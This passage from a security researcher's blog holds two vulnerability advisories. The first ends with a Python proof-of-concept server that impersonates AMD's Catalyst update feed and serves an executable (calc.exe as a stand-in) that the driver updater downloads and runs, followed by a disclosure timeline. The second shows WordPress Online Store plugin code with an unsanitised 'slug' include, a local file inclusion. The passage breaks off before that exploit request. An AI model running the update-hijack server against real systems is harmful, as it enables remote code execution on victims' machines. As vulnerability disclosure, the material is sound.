class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/TextMultiple1&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-18"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TextSingle1&gt;http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe&lt;/TextSingle1&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-19"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TechDownloadGPUSubtype&gt;Driver&lt;/TechDownloadGPUSubtype&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-20"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;ContentType&gt;GraphicsDriverFile&lt;/ContentType&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-21"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DriverVersionSupported&gt;;#12.42;#&lt;/DriverVersionSupported&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-22"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;ID&gt;956&lt;/ID&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-23"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;Modified&gt;2012-10-22T21:30:52-05:00&lt;/Modified&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-24"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;Created&gt;2012-10-22T21:30:52-05:00&lt;/Created&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-25"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;Author&gt;System Account&lt;/Author&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-26"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;Editor&gt;System Account&lt;/Editor&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-27"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;_UIVersionString&gt;1.0&lt;/_UIVersionString&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-28"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;Attachments&gt;0&lt;/Attachments&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-29"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TitleCN&gt;Catalyst Software Suite&lt;/TitleCN&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-30"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TitleBR&gt;Catalyst Software Suite&lt;/TitleBR&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-31"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TitleDE&gt;Catalyst Software Suite&lt;/TitleDE&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-32"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TitleFR&gt;Catalyst Software Suite&lt;/TitleFR&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-33"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TitleIT&gt;Catalyst Software Suite&lt;/TitleIT&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-34"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TitleLA&gt;Catalyst Software Suite&lt;/TitleLA&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-35"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DescriptionCN&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-36"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/DescriptionCN&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-37"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DescriptionBR&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-38"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/DescriptionBR&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-39"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DescriptionDE&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-40"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/DescriptionDE&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-41"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DescriptionFR&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-42"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/DescriptionFR&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-43"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DescriptionIT&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-44"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/DescriptionIT&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-45"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DescriptionLA&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-46"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/DescriptionLA&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-47"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;TitleKR&gt;(Catalyst Software Suite)&lt;/TitleKR&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-48"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;DescriptionKR&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-49"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/DescriptionKR&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-50"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;LinkTitleNoMenu&gt;Catalyst Software Suite with .NET 4 Support&lt;/LinkTitleNoMenu&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-51"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;LinkTitle&gt;Catalyst Software Suite with .NET 4 Support&lt;/LinkTitle&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-52"><span class="crayon-s">&nbsp;&nbsp;&nbsp;&nbsp;&lt;/Catalyst-Driver-Files&gt;</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-53"><span class="crayon-s">&lt;/list&gt;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-54"><span class="crayon-s">"""</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-55">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-56"><span class="crayon-t">class</span><span class="crayon-h"> </span><span class="crayon-e">ExploitHandler</span><span class="crayon-sy">(</span><span class="crayon-k ">SimpleHTTPServer</span><span class="crayon-sy">.</span><span class="crayon-i">SimpleHTTPRequestHandler</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-57"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">def</span><span class="crayon-h"> </span><span class="crayon-e">do_GET</span><span class="crayon-sy">(</span><span class="crayon-r">self</span><span class="crayon-sy">)</span><span class="crayon-o">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-58"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-s">"catalystxml"</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-i">path</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-59"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_response</span><span class="crayon-sy">(</span><span class="crayon-cn">200</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-60"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_header</span><span class="crayon-sy">(</span><span class="crayon-s">'Content-type'</span><span class="crayon-sy">,</span><span class="crayon-s">'text/xml'</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-61"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">end_headers</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-62"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-v">wfile</span><span class="crayon-sy">.</span><span class="crayon-e">write</span><span class="crayon-sy">(</span><span class="crayon-k ">xml</span><span class="crayon-sy">)</span><span class="crayon-h"> </span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-63"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">return</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-64"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">elif</span><span class="crayon-h"> </span><span class="crayon-s">".exe"</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-i">path</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-65"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_response</span><span class="crayon-sy">(</span><span class="crayon-cn">200</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-66"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">send_header</span><span class="crayon-sy">(</span><span class="crayon-s">'Content-type'</span><span class="crayon-sy">,</span><span class="crayon-s">'application/octet-stream'</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-67"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-e">end_headers</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-68"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">f</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">open</span><span class="crayon-sy">(</span><span class="crayon-i">r</span><span class="crayon-s">"C:\Windows\System32\calc.exe"</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"rb"</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-69"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-r">self</span><span class="crayon-sy">.</span><span class="crayon-v">wfile</span><span class="crayon-sy">.</span><span class="crayon-e">write</span><span class="crayon-sy">(</span><span class="crayon-v">f</span><span class="crayon-sy">.</span><span class="crayon-e">read</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-70"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">f</span><span class="crayon-sy">.</span><span class="crayon-e">close</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809981845412747-71"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">return</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-72">&nbsp;</div><div class="crayon-line" id="crayon-53c98e7809981845412747-73"><span class="crayon-v">httpd</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-k ">SocketServer</span><span class="crayon-sy">.</span><span class="crayon-e">ThreadingTCPServer</span><span class="crayon-sy">(</span><span class="crayon-sy">(</span><span class="crayon-s">'0.0.0.0'</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">80</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">ExploitHandler</span><span class="crayon-sy">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809981845412747-74"><span class="crayon-v">httpd</span><span class="crayon-sy">.</span><span class="crayon-e">serve_forever</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0133 seconds] -->
<p>By pointing  <a href="http://amd.com/" target="_blank">amd.com</a>, <a href="http://www.amd.com/" target="_blank">www.amd.com</a>, <a href="http://www.ati.com/" target="_blank">www.ati.com</a> and <a href="http://www2.ati.com/" target="_blank">www2.ati.com</a> at this script, you&#8217;ll observe that the Catalyst update feature will prompt you to update the driver, and download and execute calc.exe.</p>
<p><strong>Time table</strong></p>
<p>23.11.2012 &#8211; Sent a request for security contact details<br />
23.11.2012 &#8211; Vendor informs that they will only coordinate issues through their support ticket system<br />
23.11.2012 &#8211; Sent details as per request including proof of concept<br />
26.11.2012 &#8211; Vendor acknowledges receipt of details and request further contact details<br />
29.11.2012 &#8211; Vendor confirms that the team is working with their web team to address the issue<br />
10.12.2012 &#8211; Mail sent asking for a rough timeline<br />
14.12.2012 &#8211; Vendor replies informing that the driver team is still working on the issue, and that their legal team is also involved<br />
19.12.2012 &#8211; Vendor publishes advisory: http://support.amd.com/us/kbarticles/Pages/AMDauto-updatenotification.aspx<br />
17.01.2013 &#8211; Vendor releases AMD Catalyst 13.1, removing the update feature</p>
					</div><!-- .entry-content -->
	
	<footer class="entry-meta">
										<span class="cat-links">
				Posted in <a href="https://charlieeriksen.github.io/category/advisories/" title="View all posts in Advisories" rel="category tag">Advisories</a>			</span>
			<span class="sep"> / </span>			
						
						<span class="tag-links">
				Tagged <a href="https://charlieeriksen.github.io/tag/amd/" rel="tag">AMD</a>			</span>
			<span class="sep"> / </span>
							
				<span class="comments-link"><a href="https://charlieeriksen.github.io/2013/03/17/amd-catalyst-driver-update-vulnerability/#comments" title="Comment on AMD Catalyst driver update vulnerability">2 Comments</a></span>
		<span class="sep"> / </span>
				
					</footer><!-- #entry-meta -->
</article><!-- #post-228 -->

				
					
<article id="post-173" class="post-173 post type-post status-publish format-standard hentry category-advisories tag-lfi tag-wordpress-plugin tag-wp-online-store">
	<header class="entry-header">
				<div class="entry-meta">
			<a href="https://charlieeriksen.github.io/2013/02/18/wordpress-online-store-local-file-inclusion-vulnerability/" title="10:44 am" rel="bookmark" class="entry-date"><time datetime="2013-02-18T10:44:58+00:00" pubdate>February 18, 2013</time></a> by Charlie Eriksen		</div><!-- .entry-meta -->
		<h2 class="entry-title"><a href="https://charlieeriksen.github.io/2013/02/18/wordpress-online-store-local-file-inclusion-vulnerability/" title="Permalink to WordPress Online Store local file inclusion vulnerability" rel="bookmark">WordPress Online Store local file inclusion vulnerability</a></h2>

				
					</header><!-- .entry-header -->
	

		<div class="entry-content">
				<p><strong>Advisory</strong></p>
<p><a href="http://secunia.com/advisories/50836/">Secunia Advisory SA50836</a></p>
<p><strong>Analysis of vulnerability</strong></p>
<p>The WP Online Store exposes a shortcode for displaying the store, which is declared in <a href="http://plugins.trac.wordpress.org/browser/wp-online-store/trunk/core.php?rev=570208">core.php</a>:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7809fd5088432456" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
/* front end begins here */
function WP_online_store()
{
    //global $currencies,$currency,$messageStack,$tree,$categories_string, $cPath_array;
    //global $request_type, $session_started, $SID;
    if (!isset($_REQUEST['slug'])) {
        include(WP_PLUGIN_DIR.'/'.basename(dirname(__FILE__)).'/index.php');
    }
    if ($_REQUEST['slug']) {
        include(WP_PLUGIN_DIR.'/'.basename(dirname(__FILE__)).'/'.$_REQUEST['slug']);
    }

}</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-192">192</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-193">193</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-194">194</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-195">195</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-196">196</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-197">197</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-198">198</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-199">199</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-200">200</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-201">201</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-202">202</div><div class="crayon-num crayon-striped-num" data-line="crayon-53c98e7809fd5088432456-203">203</div><div class="crayon-num" data-line="crayon-53c98e7809fd5088432456-204">204</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7809fd5088432456-192"><span class="crayon-c">/* front end begins here */</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-193"><span class="crayon-t">function</span><span class="crayon-h"> </span><span class="crayon-e">WP_online_store</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-194"><span class="crayon-sy">{</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-195"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-c">//global $currencies,$currency,$messageStack,$tree,$categories_string, $cPath_array;</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-196"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-c">//global $request_type, $session_started, $SID;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-197"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-o">!</span><span class="crayon-e">isset</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">_REQUEST</span><span class="crayon-sy">[</span><span class="crayon-s">'slug'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-198"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-e">include</span><span class="crayon-sy">(</span><span class="crayon-v">WP_PLUGIN_DIR</span><span class="crayon-sy">.</span><span class="crayon-s">'/'</span><span class="crayon-sy">.</span><span class="crayon-e">basename</span><span class="crayon-sy">(</span><span class="crayon-e">dirname</span><span class="crayon-sy">(</span><span class="crayon-i">__FILE__</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-s">'/index.php'</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-199"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-sy">}</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-200"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">_REQUEST</span><span class="crayon-sy">[</span><span class="crayon-s">'slug'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-201"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-e">include</span><span class="crayon-sy">(</span><span class="crayon-v">WP_PLUGIN_DIR</span><span class="crayon-sy">.</span><span class="crayon-s">'/'</span><span class="crayon-sy">.</span><span class="crayon-e">basename</span><span class="crayon-sy">(</span><span class="crayon-e">dirname</span><span class="crayon-sy">(</span><span class="crayon-i">__FILE__</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-s">'/'</span><span class="crayon-sy">.</span><span class="crayon-sy">$</span><span class="crayon-v">_REQUEST</span><span class="crayon-sy">[</span><span class="crayon-s">'slug'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-202"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-sy">}</span></div><div class="crayon-line crayon-striped-line" id="crayon-53c98e7809fd5088432456-203">&nbsp;</div><div class="crayon-line" id="crayon-53c98e7809fd5088432456-204"><span class="crayon-sy">}</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0033 seconds] -->
<p></p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7809fdf284956772" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
add_shortcode('WP_online_store', 'WP_online_store');</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-53c98e7809fdf284956772-222">222</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-line" id="crayon-53c98e7809fdf284956772-222"><span class="crayon-e">add_shortcode</span><span class="crayon-sy">(</span><span class="crayon-s">'WP_online_store'</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">'WP_online_store'</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0006 seconds] -->
<p>If the &#8220;slug&#8221; request parameter isn&#8217;t defined, it will load the index page of the store. But if it is defined, it will load the relevant page which the user requests. It however does not sanitize that the &#8220;slug&#8221; is a WP Online Store file, which allows for a local file inclusion vulnerability if we create a post/page with the text &#8220;[WP_online_store]&#8220;, and submit a request with the slug set like this:</p><!-- Crayon Syntax Highlighter v2.5.0 -->

		<div id="crayon-53c98e7809fe6793789827" class="crayon-syntax crayon-theme-twilight crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; clear: both; font-size: 12px !important; line-height: 15px !important;">
		
